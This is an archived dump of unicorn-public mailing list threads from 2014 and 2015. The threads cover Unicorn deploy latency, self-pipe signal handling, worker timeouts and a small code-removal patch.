> > On Wed, Mar 4, 2015 at 12:17 PM, Michael Fischer <mfischer@zendesk.com>
> > wrote:
> >
> > > I'm not exactly sure how preload_app works, but I suspect your app is
> > > lazy-loading a number of Ruby libraries while handling the first few
> > > requests that weren't automatically loaded during the preload process.
> > >
> > > Eric, your thoughts?
>
> (top-posting corrected)
>
> Yeah, preload_app won't help startup speed if much of the app is
> autoloaded.
>
> Sarkis: which Ruby version are you running?  IIRC, 1.9.2 had terrible
> startup performance compared to 1.9.3 and later in case you're stuck on
> 1.9.2
>
> > That does make sense - I was looking at another suggestion from a user
> here
> > (Braulio) of running a "warmup" using rack MockRequest:
> > https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L77
> >
> > The only issue I am having with the above solution is it is happening in
> > the before_fork block - shouldn't I warmup the connection in after_fork?
>
> If preload_app is true, you can warmup in before_fork; otherwise it
> needs to be after_fork.
>
> > If
> > I follow the above gist properly it warms up the server with the old
> > activerecord base connection and then its turned off, then turned back on
> > in after_fork. I think I am not understanding the sequence of events
> > there...
>
> With preload_app and warmup, you need to ensure any stream connections
> (DB, memcached, redis, etc..) do not get shared between processes, so
> it's standard practice to disconnect in the parent and reconnect in the
> child.
>
> > If this is the case, I should warmup and also check/kill the old
> > master in the after_fork block after the new db, redis, neo4j connections
> > are all created. Thoughts?
>
> I've been leaving killing the master outside of the unicorn hooks
> and doing it as a separate step; seemed too fragile to do it in
> hooks from my perspective.
>



-- 
*Sarkis Varozian*
svarozian@gmail.com


^ permalink raw reply	[relevance 0%]

* Re: Request Queueing after deploy + USR2 restart
  2015-03-04 20:24  4%           ` Sarkis Varozian
  2015-03-04 20:27  0%             ` Michael Fischer
@ 2015-03-04 20:35  0%             ` Eric Wong
  2015-03-04 20:40  0%               ` Sarkis Varozian
  1 sibling, 1 reply; 200+ results
From: Eric Wong @ 2015-03-04 20:35 UTC (permalink / raw)
  To: Sarkis Varozian; +Cc: Michael Fischer, unicorn-public

Sarkis Varozian <svarozian@gmail.com> wrote:
> On Wed, Mar 4, 2015 at 12:17 PM, Michael Fischer <mfischer@zendesk.com>
> wrote:
> 
> > I'm not exactly sure how preload_app works, but I suspect your app is
> > lazy-loading a number of Ruby libraries while handling the first few
> > requests that weren't automatically loaded during the preload process.
> >
> > Eric, your thoughts?

(top-posting corrected)

Yeah, preload_app won't help startup speed if much of the app is
autoloaded.

Sarkis: which Ruby version are you running?  IIRC, 1.9.2 had terrible
startup performance compared to 1.9.3 and later in case you're stuck on
1.9.2

> That does make sense - I was looking at another suggestion from a user here
> (Braulio) of running a "warmup" using rack MockRequest:
> https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L77
> 
> The only issue I am having with the above solution is it is happening in
> the before_fork block - shouldn't I warmup the connection in after_fork?

If preload_app is true, you can warmup in before_fork; otherwise it
needs to be after_fork.

> If
> I follow the above gist properly it warms up the server with the old
> activerecord base connection and then its turned off, then turned back on
> in after_fork. I think I am not understanding the sequence of events
> there...

With preload_app and warmup, you need to ensure any stream connections
(DB, memcached, redis, etc..) do not get shared between processes, so
it's standard practice to disconnect in the parent and reconnect in the
child.

> If this is the case, I should warmup and also check/kill the old
> master in the after_fork block after the new db, redis, neo4j connections
> are all created. Thoughts?

I've been leaving killing the master outside of the unicorn hooks
and doing it as a separate step; seemed too fragile to do it in
hooks from my perspective.

^ permalink raw reply	[relevance 0%]

* Re: Request Queueing after deploy + USR2 restart
  2015-03-04 20:24  4%           ` Sarkis Varozian
@ 2015-03-04 20:27  0%             ` Michael Fischer
  2015-03-04 20:35  0%             ` Eric Wong
  1 sibling, 0 replies; 200+ results
From: Michael Fischer @ 2015-03-04 20:27 UTC (permalink / raw)
  To: Sarkis Varozian; +Cc: unicorn-public

before_fork should work fine.  The children which will actually handle the
requests will inherit everything from the parent, including any libraries
that were loaded by the master process as a result of handling the mock
requests.  It'll also conserve memory, which is a nice benefit.

On Wed, Mar 4, 2015 at 12:24 PM, Sarkis Varozian <svarozian@gmail.com>
wrote:

> That does make sense - I was looking at another suggestion from a user
> here (Braulio) of running a "warmup" using rack MockRequest:
> https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L77
>
> The only issue I am having with the above solution is it is happening in
> the before_fork block - shouldn't I warmup the connection in after_fork? If
> I follow the above gist properly it warms up the server with the old
> activerecord base connection and then its turned off, then turned back on
> in after_fork. I think I am not understanding the sequence of events
> there... If this is the case, I should warmup and also check/kill the old
> master in the after_fork block after the new db, redis, neo4j connections
> are all created. Thoughts?
>
> On Wed, Mar 4, 2015 at 12:17 PM, Michael Fischer <mfischer@zendesk.com>
> wrote:
>
>> I'm not exactly sure how preload_app works, but I suspect your app is
>> lazy-loading a number of Ruby libraries while handling the first few
>> requests that weren't automatically loaded during the preload process.
>>
>> Eric, your thoughts?
>>
>> --Michael
>>
>> On Wed, Mar 4, 2015 at 11:58 AM, Sarkis Varozian <svarozian@gmail.com>
>> wrote:
>>
>>> Yes, preload_app is set to true, I have not made any changes to the
>>> unicorn.rb from OP: http://goo.gl/qZ5NLn
>>>
>>> Hmmmm, you may be onto something - Here is the i/o metrics from the
>>> server with the highest response times: http://goo.gl/0HyUYt (in this
>>> graph: http://goo.gl/x7KcKq)
>>>
>>> Looks like it may be i/o related as you suspect - is there much I can do
>>> to alleviate that?
>>>
>>> On Wed, Mar 4, 2015 at 11:51 AM, Michael Fischer <mfischer@zendesk.com>
>>> wrote:
>>>
>>>> What does your I/O latency look like during this interval?  (iostat -xk
>>>> 10, look at the busy %).  I'm willing to bet the request queueing is
>>>> strongly correlated with I/O load.
>>>>
>>>> Also is preload_app set to true?  This should help.
>>>>
>>>> --Michael
>>>>
>>>> On Wed, Mar 4, 2015 at 11:48 AM, Sarkis Varozian <svarozian@gmail.com>
>>>> wrote:
>>>>
>>>>> Michael,
>>>>>
>>>>> Thanks for this - I have since changed the way we are restarting the
>>>>> unicorn servers after a deploy by changing capistrano task to do:
>>>>>
>>>>> in :sequence, wait: 30
>>>>>
>>>>> We have 4 backends and the above will restart them sequentially,
>>>>> waiting 30s (which I think should be more than enough time), however, I
>>>>> still get the following latency spikes after a deploy:
>>>>> http://goo.gl/tYnLUJ
>>>>>
>>>>> This is what the individual servers look like for the same time
>>>>> interval: http://goo.gl/x7KcKq
>>>>>
>>>>>
>>>>>
>>>>> On Tue, Mar 3, 2015 at 2:32 PM, Michael Fischer <mfischer@zendesk.com>
>>>>> wrote:
>>>>>
>>>>>> If the response times are falling a minute or so after the reload,
>>>>>> I'd chalk it up to a cold CPU cache.  You will probably want to stagger
>>>>>> your reloads across backends to minimize the impact.
>>>>>>
>>>>>> --Michael
>>>>>>
>>>>>> On Tue, Mar 3, 2015 at 2:24 PM, Sarkis Varozian <svarozian@gmail.com>
>>>>>> wrote:
>>>>>>
>>>>>>> We have a rails application with the following unicorn.rb:
>>>>>>> http://goo.gl/qZ5NLn
>>>>>>>
>>>>>>> When we deploy to the application, a USR2 signal is sent to the
>>>>>>> unicorn
>>>>>>> master which spins up a new master and we use the before_fork in the
>>>>>>> unicorn.rb config above to send signals to the old master as the new
>>>>>>> workers come online.
>>>>>>>
>>>>>>> I've been trying to debug a weird issue that manifests as "Request
>>>>>>> Queueing" in our Newrelic APM. The graph shows what happens after a
>>>>>>> deployment (represented by the vertical lines). Here is the graph:
>>>>>>> http://goo.gl/iFZPMv . As you see from the graph, it is
>>>>>>> inconsistent -
>>>>>>> there is always a latency spike - however, at times Request Queueing
>>>>>>> is
>>>>>>> higher than previous deploys.
>>>>>>>
>>>>>>> Any ideas on what exactly is going on here? Any suggestions on
>>>>>>> tools/profilers to use to get to the bottom of this? Should we
>>>>>>> expect this
>>>>>>> to happen on each deploy?
>>>>>>>
>>>>>>> Thanks,
>>>>>>>
>>>>>>> --
>>>>>>> *Sarkis Varozian*
>>>>>>> svarozian@gmail.com
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>
>>>>>
>>>>>
>>>>> --
>>>>> *Sarkis Varozian*
>>>>> svarozian@gmail.com
>>>>>
>>>>
>>>>
>>>
>>>
>>> --
>>> *Sarkis Varozian*
>>> svarozian@gmail.com
>>>
>>
>>
>
>
> --
> *Sarkis Varozian*
> svarozian@gmail.com
>




^ permalink raw reply	[relevance 0%]

* Re: Request Queueing after deploy + USR2 restart
  @ 2015-03-04 20:24  4%           ` Sarkis Varozian
  2015-03-04 20:27  0%             ` Michael Fischer
  2015-03-04 20:35  0%             ` Eric Wong
  0 siblings, 2 replies; 200+ results
From: Sarkis Varozian @ 2015-03-04 20:24 UTC (permalink / raw)
  To: Michael Fischer; +Cc: unicorn-public

That does make sense - I was looking at another suggestion from a user here
(Braulio) of running a "warmup" using rack MockRequest:
https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L77

The only issue I am having with the above solution is it is happening in
the before_fork block - shouldn't I warmup the connection in after_fork? If
I follow the above gist properly it warms up the server with the old
activerecord base connection and then its turned off, then turned back on
in after_fork. I think I am not understanding the sequence of events
there... If this is the case, I should warmup and also check/kill the old
master in the after_fork block after the new db, redis, neo4j connections
are all created. Thoughts?

On Wed, Mar 4, 2015 at 12:17 PM, Michael Fischer <mfischer@zendesk.com>
wrote:

> I'm not exactly sure how preload_app works, but I suspect your app is
> lazy-loading a number of Ruby libraries while handling the first few
> requests that weren't automatically loaded during the preload process.
>
> Eric, your thoughts?
>
> --Michael
>
> On Wed, Mar 4, 2015 at 11:58 AM, Sarkis Varozian <svarozian@gmail.com>
> wrote:
>
>> Yes, preload_app is set to true, I have not made any changes to the
>> unicorn.rb from OP: http://goo.gl/qZ5NLn
>>
>> Hmmmm, you may be onto something - Here is the i/o metrics from the
>> server with the highest response times: http://goo.gl/0HyUYt (in this
>> graph: http://goo.gl/x7KcKq)
>>
>> Looks like it may be i/o related as you suspect - is there much I can do
>> to alleviate that?
>>
>> On Wed, Mar 4, 2015 at 11:51 AM, Michael Fischer <mfischer@zendesk.com>
>> wrote:
>>
>>> What does your I/O latency look like during this interval?  (iostat -xk
>>> 10, look at the busy %).  I'm willing to bet the request queueing is
>>> strongly correlated with I/O load.
>>>
>>> Also is preload_app set to true?  This should help.
>>>
>>> --Michael
>>>
>>> On Wed, Mar 4, 2015 at 11:48 AM, Sarkis Varozian <svarozian@gmail.com>
>>> wrote:
>>>
>>>> Michael,
>>>>
>>>> Thanks for this - I have since changed the way we are restarting the
>>>> unicorn servers after a deploy by changing capistrano task to do:
>>>>
>>>> in :sequence, wait: 30
>>>>
>>>> We have 4 backends and the above will restart them sequentially,
>>>> waiting 30s (which I think should be more than enough time), however, I
>>>> still get the following latency spikes after a deploy:
>>>> http://goo.gl/tYnLUJ
>>>>
>>>> This is what the individual servers look like for the same time
>>>> interval: http://goo.gl/x7KcKq
>>>>
>>>>
>>>>
>>>> On Tue, Mar 3, 2015 at 2:32 PM, Michael Fischer <mfischer@zendesk.com>
>>>> wrote:
>>>>
>>>>> If the response times are falling a minute or so after the reload, I'd
>>>>> chalk it up to a cold CPU cache.  You will probably want to stagger your
>>>>> reloads across backends to minimize the impact.
>>>>>
>>>>> --Michael
>>>>>
>>>>> On Tue, Mar 3, 2015 at 2:24 PM, Sarkis Varozian <svarozian@gmail.com>
>>>>> wrote:
>>>>>
>>>>>> We have a rails application with the following unicorn.rb:
>>>>>> http://goo.gl/qZ5NLn
>>>>>>
>>>>>> When we deploy to the application, a USR2 signal is sent to the
>>>>>> unicorn
>>>>>> master which spins up a new master and we use the before_fork in the
>>>>>> unicorn.rb config above to send signals to the old master as the new
>>>>>> workers come online.
>>>>>>
>>>>>> I've been trying to debug a weird issue that manifests as "Request
>>>>>> Queueing" in our Newrelic APM. The graph shows what happens after a
>>>>>> deployment (represented by the vertical lines). Here is the graph:
>>>>>> http://goo.gl/iFZPMv . As you see from the graph, it is inconsistent
>>>>>> -
>>>>>> there is always a latency spike - however, at times Request Queueing
>>>>>> is
>>>>>> higher than previous deploys.
>>>>>>
>>>>>> Any ideas on what exactly is going on here? Any suggestions on
>>>>>> tools/profilers to use to get to the bottom of this? Should we expect
>>>>>> this
>>>>>> to happen on each deploy?
>>>>>>
>>>>>> Thanks,
>>>>>>
>>>>>> --
>>>>>> *Sarkis Varozian*
>>>>>> svarozian@gmail.com
>>>>>>
>>>>>>
>>>>>>
>>>>>
>>>>
>>>>
>>>> --
>>>> *Sarkis Varozian*
>>>> svarozian@gmail.com
>>>>
>>>
>>>
>>
>>
>> --
>> *Sarkis Varozian*
>> svarozian@gmail.com
>>
>
>


-- 
*Sarkis Varozian*
svarozian@gmail.com


^ permalink raw reply	[relevance 4%]

* Re: Bug, Unicorn can drop signals in extreme conditions
  @ 2015-02-18  9:15  3% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-02-18  9:15 UTC (permalink / raw)
  To: Steven Stewart-Gallus; +Cc: unicorn-public, Jesse Storimer

Steven Stewart-Gallus <sstewartgallus00@mylangara.bc.ca> wrote:
> Hello,
> 
> While reading the article at
> http://www.sitepoint.com/the-self-pipe-trick-explained/ I realized
> that the signal handling code shown there and of the same type in your
> application is broken.  As you have a single nonblocking pipe in your
> application you can drop signals entirely (and not just fold multiple
> signals of the same type into one).  The simplest fix is to use a pipe
> for each individual type of signal or to just use pselect or similar.
> I'm pretty sure that there is a way to use a single pipe but it seems
> complicated and very difficult to implement correctly.

(I've Cc-ed Jesse for this)

I wasn't sure exactly what you were referring to, but now I see where
the sitepoint.com article makes calls in the wrong order:

     self_writer.write_nonblock('.') # XXX may fail!
     SIGNAL_QUEUE << signal

In contrast, unicorn enqueues the signal before attempting to write to
the pipe, so we don't care at all if the write fails.  It doesn't matter
if the non-blocking write fails due to the pipe being full at all; as
any existing data in the pipe is sufficient to cause the reader to wake
up.

The correct order would be:

     SIGNAL_QUEUE << signal
     self_writer.write_nonblock('.') # we don't care if this fails

Furthermore, this avoids a race condition in multi-threaded situations.
Order is critical, even outside of signal handlers, this ordering of
events is fundamental to correct usage of things like condition
variables and waitqueues.


Btw, MRI 1.9.3+ also uses the self-pipe trick internally, too (see
thread_pthread.c) for signals and thread switching.  Current versions
use two pipes, one for high-priority wakeups, and one for low-priority
wakeups.

And on a related note, using pselect/ppoll/epoll_pwait/signalfd-style
syscalls which affect the signal mask is not feasible with runtimes
which already implement a high-level signal handling API.  I ripped out
signalfd support from sleepy_penguin a few years back because it would
always conflict with the signal handling API in Ruby itself...

And eventfd is cheaper and usable in place of a self-pipe from Ruby, of
course(*), but I haven't convinced ruby-core it's worth the maintenance
effort for thread_pthread.c; so a conservative project like unicorn
won't use it, yet.

Anyways, thanks for bringing this to our attention.


(*) I use it in yet another horribly-named server :)

^ permalink raw reply	[relevance 3%]

* Re: Timeouts longer than expected.
  @ 2015-01-29 20:00  5% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-01-29 20:00 UTC (permalink / raw)
  To: Antony Gelberg; +Cc: unicorn-public

Antony Gelberg <antony.gelberg@gmail.com> wrote:
> Hi all.  We use unicorn in production across four servers, behind
> nginx and HAProxy (to load balance).  We set a 300s timeout in the
> config file.  On an average day, we see something like:
> 
> E, [2015-01-22T17:01:24.335600 #4311] ERROR -- : worker=2 PID:21101
> timeout (301s > 300s), killing
> 
> in our logs, ~60 times.  However, one day we noticed that production
> had gone down with all the unicorns showing entries like the
> following:
> 
> E, [2015-01-22T12:35:15.643020 #4311] ERROR -- : worker=1 PID:4605
> timeout (451s > 300s), killing
> 
> (note the 451s before it was killed).

What other log entries appear in the 8 minutes leading up to the 451s
line?

Which version of unicorn is this?

There were some bugs fixed in ancient unicorn versions; and current
versions are still affected by big NTP adjustments due to the lack of
monotonic clock API in older Rubies.

I have a patch queued up for 5.x to use the monotonic clock, but
requires Ruby 2.1+ to be useful:
http://bogomips.org/unicorn-public/m/20150118033916.GA4478%40dcvr.yhbt.net.html

Maybe there's another sleep calculation bug, though.  Not many people
rely on giant timeouts and probably never notice it.

I'll take a closer look at the master sleep calculations (in
murder_lazy_workers) in a week or so and see if there's another problem
lurking in the current versions.

> Any clues how we can better-understand the root cause, even if it's
> something we'll put in place for the future?  We lack visibility here.

I'd use an in-process timeout to get backtraces.  The
Application_Timeouts doc in the source and online has more
tips on dealing with timeouts in general.

  http://unicorn.bogomips.org/Application_Timeouts.html

Also curious: you have users willing to wait 5 minutes for an
HTTP response?  Yikes!

^ permalink raw reply	[relevance 5%]

* [RFC] remove old inetd+git examples and exec_cgi
@ 2015-01-22  5:12  4% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-01-22  5:12 UTC (permalink / raw)
  To: unicorn-public

I'm tempted to remove these for 5.x, but maybe somebody depends on the
lib/unicorn/app/* portions somewhere... Does anybody care?

Subject: [PATCH] remove old inetd+git examples and exec_cgi

While it was technically interesting and fun to tunnel arbitrary
protocols over a semi-compliant Rack interface, nobody actually does
it (and anybody who does can look in our git history).  This was
from back in 2009 when this was one of the few servers that could
handle chunked uploads, nowadays everyone does it! (or do they? :)

A newer version of exec_cgi.rb still lives on in the repository of
yet another horribly-named server, but there's no point in bloating
the installation footprint of somewhat popular server such as unicorn.
---
 examples/git.ru             |  13 ----
 lib/unicorn/app/exec_cgi.rb | 154 --------------------------------------------
 lib/unicorn/app/inetd.rb    | 109 -------------------------------
 3 files changed, 276 deletions(-)
 delete mode 100644 examples/git.ru
 delete mode 100644 lib/unicorn/app/exec_cgi.rb
 delete mode 100644 lib/unicorn/app/inetd.rb
-- 
EW

^ permalink raw reply	[relevance 4%]

* Re: Unicorn workers timing out intermittently
  2014-12-30 18:12  0% ` Eric Wong
@ 2014-12-30 20:02  0%   ` Aaron Price
  0 siblings, 0 replies; 200+ results
From: Aaron Price @ 2014-12-30 20:02 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

Thank for your help, Eric.

I was able to pinpoint the issue, and I've posted the solution.

The issue was that I wasn't closing a database connection for code being
run in custom Rack middleware. Which is why the logs didn't show anything.

http://serverfault.com/questions/655430/unicorn-workers-timing-out-intermittently/655478#655478

Thanks again.


On Tue, Dec 30, 2014 at 1:12 PM, Eric Wong <e@80x24.org> wrote:

> Aaron Price <aprice@flipgive.com> wrote:
> > Hey guys,
> >
> > I'm having the following issue and I was hoping you might be able to shed
> > some light on the issue. Maybe give some suggestions on how to debug the
> > actual problem.
> >
> >
> http://serverfault.com/questions/655430/unicorn-workers-timing-out-intermittently
>
> (quoting the problem in full to save folks from having to load the page)
>
> >    I'm getting intermittent timeouts from unicorn workers for seemingly
> no
> >    reason, and I'd like some help to debug the actual problem. It's worse
> >    because it works about 10 - 20 requests then 1 will timeout, then
> >    another 10 - 20 requests and the same thing will happen again.
> >
> >    I've created a dev environment to illustrate this particular problem,
> >    so there is NO traffic except mine.
> >
> >    The stack is Ubuntu 14.04, Rails 3.2.21, PostgreSQL 9.3.4, Unicorn
> >    4.8.3, Nginx 1.6.2.
> >
> >    The Problem
> >
> >    I'll describe in detail the time that it doesn't work.
> >
> >    I request a url through the browser.
> > Started GET
> "/offers.xml?q%5bupdated_at_greater_than_or_equal_to%5d=2014-12-28T1
> > 8:01:16Z&q%5bupdated_at_less_than_or_equal_to%5d=2014-12-28T19:30:21Z"
> for 127.0
> > .0.1 at 2014-12-30 15:58:59 +0000
> > Completed 200 OK in 10.3ms (Views: 0.0ms | ActiveRecord: 2.1ms)
> >
> >    As you can see, the request completed successfully with a 200 response
> >    status in just 10.3ms.
> >
> >    However, the browser hangs for about 30 seconds and Unicorn kills the
> >    worker:
> > E, [2014-12-30T15:59:30.267605 #13678] ERROR -- : worker=0 PID:14594
> timeout (31
> > s > 30s), killing
> > E, [2014-12-30T15:59:30.279000 #13678] ERROR -- : reaped
> #<Process::Status: pid
> > 14594 SIGKILL (signal 9)> worker=0
> > I, [2014-12-30T15:59:30.355085 #23533]  INFO -- : worker=0 ready
> >
> >    And the following error in the Nginx logs:
> > 2014/12/30 15:59:30 [error] 23463#0: *27 upstream prematurely closed
> connection
> > while reading response header from upstream, client: 127.0.0.1, server:
> localhos
> > t, request: "GET
> /offers.xml?q%5bupdated_at_greater_than_or_equal_to%5d=2014-12-
> >
> 28T18:01:16Z&q%5bupdated_at_less_than_or_equal_to%5d=2014-12-28T19:30:21Z
> HTTP/1
> > .1", upstream: "http://unix:
> /app/shared/tmp/sockets/unicorn.sock:/offers.xml?q%5
> >
> bupdated_at_greater_than_or_equal_to%5d=2014-12-28T18:01:16Z&q%5bupdated_at_less
> > _than_or_equal_to%5d=2014-12-28T19:30:21Z", host: "localhost", referrer:
> "http:/
> >
> /localhost/offers.xml?q%5bupdated_at_greater_than_or_equal_to%5d=2014-12-28T18:0
> > 1:16Z&q%5bupdated_at_less_than_or_equal_to%5d=2014-12-28T19:30:21Z"
>
> OK, the problem should be reproducible hitting unicorn directly (easy to
> configure a TCP listener) and eliminating nginx as a possible
> point-of-failure.  Also, I suggest using curl so you can script and see
> everything going on more easily at the protocol/syscall level.
>
> >    Again. There's no load on the server at all. The only requests going
> >    through are my own and every 10 - 20 requests at random have this same
> >    problem.
>
> OK, the main culprit is usually external connections acting up.  Postgres,
> external monitoring services, network failures, etc...
>
> >    It doesn't look like unicorn is eating memory at all. I know this
> >    because I'm using watch -n 0.5 free -m and this is the result.
>
> What does the CPU usage look like?
>
> >              total       used       free     shared    buffers     cached
> > Mem:          1995        765       1229          0         94        405
> > -/+ buffers/cache:        264       1730
> > Swap:          511          0        511
> >
> >    So the server isn't running out of memory.
> >
> >    Is there anything further I can do to debug this issue? or any insight
> >    into what's happening?
>
> Basically, minimize and isolate things.  Use a single worker, strace
> that worker ("strace -f -p $PID_OF_WORKER") and send a request to it
> using curl.
>
> Is the Postgres doing OK?  How is the network connection to that?
> What other external resources (monitoring services, memcached, redis,
> etc...) might you be hitting?  You'll see blocking (on things like
> read*/write*/select/poll/recvmsg/sendmsg) on strace.
>
> You can map numeric file descriptors to ports via:
>  lsof -p $PID_OF_WORKER
>
> Also, is your server running out of entropy?  (You'll see blocking on
> reading /dev/random via strace) and you may also see low values in
> /proc/sys/kernel/random/entropy_avail
>



-- 
*Aaron Price*
Sr. Web Developer
FlipGive
P: (416) 583-2510

312 Adelaide St. West, Suite 301
Toronto, ON, M5V 1R2
www.flipgive.com

Follow us on: Facebook <http://www.facebook.com/FlipGive> | Twitter
<http://twitter.com/FlipGive> | LinkedIn
<http://www.linkedin.com/company/FlipGive>


^ permalink raw reply	[relevance 0%]

* Re: Unicorn workers timing out intermittently
  @ 2014-12-30 18:12  0% ` Eric Wong
  2014-12-30 20:02  0%   ` Aaron Price
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2014-12-30 18:12 UTC (permalink / raw)
  To: Aaron Price; +Cc: unicorn-public

Aaron Price <aprice@flipgive.com> wrote:
> Hey guys,
> 
> I'm having the following issue and I was hoping you might be able to shed
> some light on the issue. Maybe give some suggestions on how to debug the
> actual problem.
> 
> http://serverfault.com/questions/655430/unicorn-workers-timing-out-intermittently

(quoting the problem in full to save folks from having to load the page)

>    I'm getting intermittent timeouts from unicorn workers for seemingly no
>    reason, and I'd like some help to debug the actual problem. It's worse
>    because it works about 10 - 20 requests then 1 will timeout, then
>    another 10 - 20 requests and the same thing will happen again.
> 
>    I've created a dev environment to illustrate this particular problem,
>    so there is NO traffic except mine.
> 
>    The stack is Ubuntu 14.04, Rails 3.2.21, PostgreSQL 9.3.4, Unicorn
>    4.8.3, Nginx 1.6.2.
> 
>    The Problem
> 
>    I'll describe in detail the time that it doesn't work.
> 
>    I request a url through the browser.
> Started GET "/offers.xml?q%5bupdated_at_greater_than_or_equal_to%5d=2014-12-28T1
> 8:01:16Z&q%5bupdated_at_less_than_or_equal_to%5d=2014-12-28T19:30:21Z" for 127.0
> .0.1 at 2014-12-30 15:58:59 +0000
> Completed 200 OK in 10.3ms (Views: 0.0ms | ActiveRecord: 2.1ms)
> 
>    As you can see, the request completed successfully with a 200 response
>    status in just 10.3ms.
> 
>    However, the browser hangs for about 30 seconds and Unicorn kills the
>    worker:
> E, [2014-12-30T15:59:30.267605 #13678] ERROR -- : worker=0 PID:14594 timeout (31
> s > 30s), killing
> E, [2014-12-30T15:59:30.279000 #13678] ERROR -- : reaped #<Process::Status: pid
> 14594 SIGKILL (signal 9)> worker=0
> I, [2014-12-30T15:59:30.355085 #23533]  INFO -- : worker=0 ready
> 
>    And the following error in the Nginx logs:
> 2014/12/30 15:59:30 [error] 23463#0: *27 upstream prematurely closed connection
> while reading response header from upstream, client: 127.0.0.1, server: localhos
> t, request: "GET /offers.xml?q%5bupdated_at_greater_than_or_equal_to%5d=2014-12-
> 28T18:01:16Z&q%5bupdated_at_less_than_or_equal_to%5d=2014-12-28T19:30:21Z HTTP/1
> .1", upstream: "http://unix:/app/shared/tmp/sockets/unicorn.sock:/offers.xml?q%5
> bupdated_at_greater_than_or_equal_to%5d=2014-12-28T18:01:16Z&q%5bupdated_at_less
> _than_or_equal_to%5d=2014-12-28T19:30:21Z", host: "localhost", referrer: "http:/
> /localhost/offers.xml?q%5bupdated_at_greater_than_or_equal_to%5d=2014-12-28T18:0
> 1:16Z&q%5bupdated_at_less_than_or_equal_to%5d=2014-12-28T19:30:21Z"

OK, the problem should be reproducible hitting unicorn directly (easy to
configure a TCP listener) and eliminating nginx as a possible
point-of-failure.  Also, I suggest using curl so you can script and see
everything going on more easily at the protocol/syscall level.

>    Again. There's no load on the server at all. The only requests going
>    through are my own and every 10 - 20 requests at random have this same
>    problem.

OK, the main culprit is usually external connections acting up.  Postgres,
external monitoring services, network failures, etc...

>    It doesn't look like unicorn is eating memory at all. I know this
>    because I'm using watch -n 0.5 free -m and this is the result.

What does the CPU usage look like?

>              total       used       free     shared    buffers     cached
> Mem:          1995        765       1229          0         94        405
> -/+ buffers/cache:        264       1730
> Swap:          511          0        511
> 
>    So the server isn't running out of memory.
> 
>    Is there anything further I can do to debug this issue? or any insight
>    into what's happening?

Basically, minimize and isolate things.  Use a single worker, strace
that worker ("strace -f -p $PID_OF_WORKER") and send a request to it
using curl.

Is the Postgres doing OK?  How is the network connection to that?
What other external resources (monitoring services, memcached, redis,
etc...) might you be hitting?  You'll see blocking (on things like
read*/write*/select/poll/recvmsg/sendmsg) on strace.

You can map numeric file descriptors to ports via:
 lsof -p $PID_OF_WORKER

Also, is your server running out of entropy?  (You'll see blocking on
reading /dev/random via strace) and you may also see low values in
/proc/sys/kernel/random/entropy_avail

^ permalink raw reply	[relevance 0%]

* [PATCH] tmpio: drop the "size" method
  @ 2014-12-28  7:17  4%   ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2014-12-28  7:17 UTC (permalink / raw)
  To: unicorn-public

Eric Wong <e@80x24.org> wrote:
> But there ought to be tiny gains made from dropping 1.8 support,
> so I'll probably go ahead and do it...

Tiny stuff like this:
----------------------------8<-------------------------
From: Eric Wong <e@80x24.org>
Subject: [PATCH] tmpio: drop the "size" method

It is redundant given the existence of File#size in Ruby 1.9+

This saves 1440 bytes of bytecode on x86-64 under 2.2.0,
and at least another 120 bytes for the method entry,
hash table entry, and method definition overhead.
---
 lib/unicorn/tmpio.rb | 5 -----
 1 file changed, 5 deletions(-)

diff --git a/lib/unicorn/tmpio.rb b/lib/unicorn/tmpio.rb
index 2da05a2..c97979a 100644
--- a/lib/unicorn/tmpio.rb
+++ b/lib/unicorn/tmpio.rb
@@ -21,9 +21,4 @@ class Unicorn::TmpIO < File
     fp.sync = true
     fp
   end
-
-  # for easier env["rack.input"] compatibility with Rack <= 1.1
-  def size
-    stat.size
-  end unless File.method_defined?(:size)
 end
-- 
EW


^ permalink raw reply related	[relevance 4%]

* RE: Issue with Unicorn: Big latency when getting a request
  2014-11-14 10:28  5%                   ` Eric Wong
@ 2014-11-14 10:51  0%                     ` Roberto Cordoba del Moral
  0 siblings, 0 replies; 200+ results
From: Roberto Cordoba del Moral @ 2014-11-14 10:51 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public@bogomips.org

I´m getting this warn message when starting NGINX








nginx: [warn] 1024 worker_connections exceed open file resource limit: 256
Could it be related to this?
> Date: Fri, 14 Nov 2014 10:28:57 +0000
> From: e@80x24.org
> To: roberto.chingon@hotmail.com
> CC: unicorn-public@bogomips.org
> Subject: Re: Issue with Unicorn: Big latency when getting a request
> 
> Can you try Thin, Puma or another server?
> 
> Maybe configuring more unicorn worker_processes can help if your JS
> needs multiple connections to function for some reason.
> unicorn cannot do concurrency without multiple worker_processes.
> 
> I cannot view screenshots (or any images/video).
 		 	   		  

^ permalink raw reply	[relevance 0%]

* Re: Issue with Unicorn: Big latency when getting a request
  @ 2014-11-14 10:28  5%                   ` Eric Wong
  2014-11-14 10:51  0%                     ` Roberto Cordoba del Moral
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2014-11-14 10:28 UTC (permalink / raw)
  To: Roberto Cordoba del Moral; +Cc: unicorn-public

Can you try Thin, Puma or another server?

Maybe configuring more unicorn worker_processes can help if your JS
needs multiple connections to function for some reason.
unicorn cannot do concurrency without multiple worker_processes.

I cannot view screenshots (or any images/video).

^ permalink raw reply	[relevance 5%]

* Re: Having issue with Unicorn
  2014-10-24 20:58  5%                   ` Eric Wong
@ 2014-10-24 21:24  0%                     ` Imdad
  0 siblings, 0 replies; 200+ results
From: Imdad @ 2014-10-24 21:24 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

Thanks Eric, will look into this issue.

Much appreciated if you could forward this issue to someone who can help
here.

Thanks again for your cooperation.

Cheers!
Imdad Ali Khan
Mob (0) 9818484057
http://www.linkedin.com/in/imdad

On 25 October 2014 02:28, Eric Wong <e@80x24.org> wrote:

> Imdad <khanimdad@gmail.com> wrote:
